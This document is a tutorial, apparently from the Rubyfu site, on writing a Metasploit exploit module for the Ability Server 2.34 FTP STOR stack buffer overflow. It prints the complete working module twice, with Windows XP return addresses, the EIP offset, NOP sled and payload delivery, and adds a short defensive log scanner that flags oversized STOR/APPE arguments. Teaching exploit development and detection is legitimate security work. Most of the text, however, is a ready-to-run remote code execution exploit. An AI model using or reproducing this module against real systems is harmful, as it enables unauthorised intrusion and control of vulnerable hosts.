Exploit module

Remote Exploit

FTP exploit

Our example targets a very simple vulnerable FTP server called Ability Server.

What do we want?

  • Create Exploit module
  • Exploit FTP Server
  • Set exploit rank
  • Describe The module
  • Let people know we created this module
  • Add references about the vulnerability that we exploit
  • Choose a default payload
  • Set the bad characters.
  • Set Disclosure Date
  • Targets and their return address (EIP offset)
  • Options to set the target IP and port, plus username and password if required.
  • Check whether the target is vulnerable.
  • Send the exploit
  • Check if the module has been written correctly (msftidy.rb)

Steps

  • Create Exploit module
  • Exploit FTP Server
  • Set the module's rank

```ruby
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

### Module Type ###
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  # Brings in connect, connect_login, banner, send_cmd and the FTP options
  include Msf::Exploit::Remote::Ftp
```
  • Describe the module
  • Let people know we created this module
  • Add references about the vulnerability that we exploit
  • Choose a default payload
  • Set the bad characters.
  • Set Disclosure Date
  • Targets and their return address (EIP offset)
  • Options to set the target IP and port, plus username and password if required.

```ruby
  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'Ability Server 2.34 STOR Command Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow in Ability Server 2.34.
        Ability Server fails to check input size when parsing 'STOR' and 'APPE' commands,
        which leads to a stack based buffer overflow. This plugin uses the 'STOR' command.
        The vulnerability has been confirmed on version 2.34 and has also been reported
        in version 2.25 and 2.32. Other versions may also be affected.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'muts',            # Initial discovery
          'Dark Eagle',      # same as muts
          'Peter Osterberg', # Metasploit
          'Ruby (@Rubyfu)',  # Just explain the module
        ],
      'References'     =>
        [
          [ 'CVE', '2004-1626' ],
          [ 'OSVDB', '11030' ],
          [ 'EDB', '588' ],
          [ 'URL', 'http://rubyfu.net' ] # Just explain the module
        ],
      'Platform'       => %w{ win },
      'Targets'        =>
        [
          [
            'Windows XP SP2 ENG',
            {
              # JMP ESP (MFC42.dll. Addr remains unchanged until a patched SP3)
              'Ret'    => 0x73E32ECF,
              'Offset' => 966
            }
          ],
          [
            'Windows XP SP3 ENG',
            {
              # JMP ESP (USER32.dll. Unchanged unpatched SP3 - fully patched)
              'Ret'    => 0x7E429353,
              'Offset' => 966
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 22 2004'
    ))

    # RHOST comes from the Remote mixin; we add the FTP port and credentials
    register_options(
      [
        Opt::RPORT(21),
        OptString.new('FTPUSER', [ true, 'Valid FTP username', 'ftp' ]),
        OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'ftp' ])
      ], self.class)
  end
```
  • Check whether the target is vulnerable.

```ruby
  def check
    # Connect only to grab the banner; the Ftp mixin keeps it after disconnect
    connect
    disconnect
    if banner =~ /Ability Server 2\.34/
      return Exploit::CheckCode::Appears
    else
      if banner =~ /Ability Server/
        return Exploit::CheckCode::Detected
      end
    end
    return Exploit::CheckCode::Safe
  end
```
  • Send the exploit

```ruby
  def exploit
    c = connect_login
    return if not c

    myhost = datastore['LHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['LHOST']

    # Take client IP address + FTP user lengths into account for EIP offset
    padd_size = target['Offset'] + (13 - myhost.length) + (3 - datastore['FTPUSER'].length)
    junk = rand_text_alpha(padd_size)

    sploit = junk
    sploit << [target.ret].pack('V')  # overwrite EIP with the target's JMP ESP address
    sploit << make_nops(32)
    sploit << payload.encoded
    sploit << rand_text_alpha(sploit.length)

    send_cmd(['STOR', sploit], false)
    handler
    disconnect
  end
```
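
The module's description says the bug is that the server never checks the size of the 'STOR' and 'APPE' arguments. Seen from the defender's side, that makes an oversized argument to either command the thing to look for. The following is an added example, not part of the Rubyfu page or of the Metasploit module: a small detector that scans FTP command-log lines and flags STOR/APPE arguments far longer than any real filename. The log line format, the 255-byte threshold and the sample lines are all constructed for the example.

```ruby
# The module pads 966 bytes before the return address, so a real attempt is
# far above any sane filename length. 255 (the usual path-component limit,
# chosen here as an assumption) flags the attempt well below that point.
MAX_FTP_ARG_LEN = 255

# Constructed log format: "<date> <time> <client-ip> <CMD> [<argument>]"
LOG_LINE = /\A(?<ts>\S+ \S+) (?<src>\S+) (?<cmd>[A-Z]{3,4})(?: (?<arg>.*))?\z/

# Returns an alert hash for one log line, or nil when the line is benign
# (or does not parse at all).
def check_ftp_line(line)
  m = LOG_LINE.match(line.chomp)
  return nil unless m

  cmd = m[:cmd]
  arg = m[:arg].to_s
  return nil unless %w[STOR APPE].include?(cmd) && arg.length > MAX_FTP_ARG_LEN

  {
    time: m[:ts], src: m[:src], cmd: cmd, arg_len: arg.length,
    # Purely alphabetic filler is what rand_text_alpha produces; it is only
    # a triage hint, the alert itself is decided on length alone.
    alpha_filler: arg.match?(/\A[A-Za-z]+\z/)
  }
end

# Scans an array of lines and returns every alert in log order.
def scan_ftp_log(lines)
  lines.map { |l| check_ftp_line(l) }.compact
end

# Constructed sample session: a normal upload followed by an oversized APPE.
SAMPLE_LOG = [
  "2004-10-22 10:15:31 10.0.0.5 USER ftp",
  "2004-10-22 10:15:31 10.0.0.5 PASS ftp",
  "2004-10-22 10:15:32 10.0.0.5 STOR report.txt",
  "2004-10-22 10:15:33 10.0.0.5 APPE " + ("A" * 1000),
  "2004-10-22 10:15:34 10.0.0.5 QUIT",
]

if __FILE__ == $PROGRAM_NAME
  scan_ftp_log(SAMPLE_LOG).each do |a|
    puts "#{a[:time]} #{a[:src]} oversized #{a[:cmd]} argument (#{a[:arg_len]} bytes)"
  end
end
```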

Wrapping up

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'Ability Server 2.34 STOR Command Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow in Ability Server 2.34.
        Ability Server fails to check input size when parsing 'STOR' and 'APPE' commands,
        which leads to a stack based buffer overflow. This plugin uses the 'STOR' command.
        The vulnerability has been confirmed on version 2.34 and has also been reported
        in version 2.25 and 2.32. Other versions may also be affected.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'muts',            # Initial discovery
          'Dark Eagle',      # same as muts
          'Peter Osterberg', # Metasploit
          'Ruby (@Rubyfu)',  # Just explain the module
        ],
      'References'     =>
        [
          [ 'CVE', '2004-1626' ],
          [ 'OSVDB', '11030' ],
          [ 'EDB', '588' ],
          [ 'URL', 'http://rubyfu.net' ] # Just explain the module
        ],
      'Platform'       => %w{ win },
      'Targets'        =>
        [
          [
            'Windows XP SP2 ENG',
            {
              # JMP ESP (MFC42.dll. Addr remains unchanged until a patched SP3)
              'Ret'    => 0x73E32ECF,
              'Offset' => 966
            }
          ],
          [
            'Windows XP SP3 ENG',
            {
              # JMP ESP (USER32.dll. Unchanged unpatched SP3 - fully patched)
              'Ret'    => 0x7E429353,
              'Offset' => 966
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 22 2004'
    ))

    register_options(
      [
        Opt::RPORT(21),
        OptString.new('FTPUSER', [ true, 'Valid FTP username', 'ftp' ]),
        OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'ftp' ])
      ], self.class)
  end

  def check
    connect
    disconnect
    if banner =~ /Ability Server 2\.34/
      return Exploit::CheckCode::Appears
    else
      if banner =~ /Ability Server/
        return Exploit::CheckCode::Detected
      end
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    c = connect_login
    return if not c

    myhost = datastore['LHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['LHOST']

    # Take client IP address + FTP user lengths into account for EIP offset
    padd_size = target['Offset'] + (13 - myhost.length) + (3 - datastore['FTPUSER'].length)
    junk = rand_text_alpha(padd_size)

    sploit = junk
    sploit << [target.ret].pack('V')
    sploit << make_nops(32)
    sploit << payload.encoded
    sploit << rand_text_alpha(sploit.length)

    send_cmd(['STOR', sploit], false)
    handler
    disconnect
  end
end
```
  • Check if the module has been written correctly (msftidy.rb)

```shell
metasploit-framework/tools/dev/msftidy.rb ability_server_stor.rb
```